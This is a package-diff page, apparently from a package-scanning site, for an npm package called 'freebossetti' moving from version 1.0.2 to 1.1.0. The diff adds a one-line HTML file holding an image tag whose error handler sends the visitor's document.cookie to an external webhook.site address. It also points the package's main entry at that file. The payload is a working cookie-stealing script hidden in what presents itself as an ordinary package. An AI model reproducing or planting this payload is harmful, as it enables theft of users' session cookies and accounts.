freebossetti 1.0.2 → 1.1.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/bossetti.html +1 -0
  2. package/package.json +2 -2
package/bossetti.html ADDED
@@ -0,0 +1 @@
1
+ <img src=x onerror='window.location.href("https://webhook.site/26c5dbf7-e176-4859-81e1-cdfa0b13b14c/?cookie="+document.cookie);'>
package/package.json CHANGED
@@ -1,8 +1,8 @@
1
1
  {
2
2
  "name": "freebossetti",
3
- "version": "1.0.2",
3
+ "version": "1.1.0",
4
4
  "description": "BOSSETTI LIBERO!",
5
- "main": "xd.js",
5
+ "main": "bossetti.html",
6
6
  "scripts": {
7
7
  "test": "echo \"Error: no test specified\" && exit 1"
8
8
  },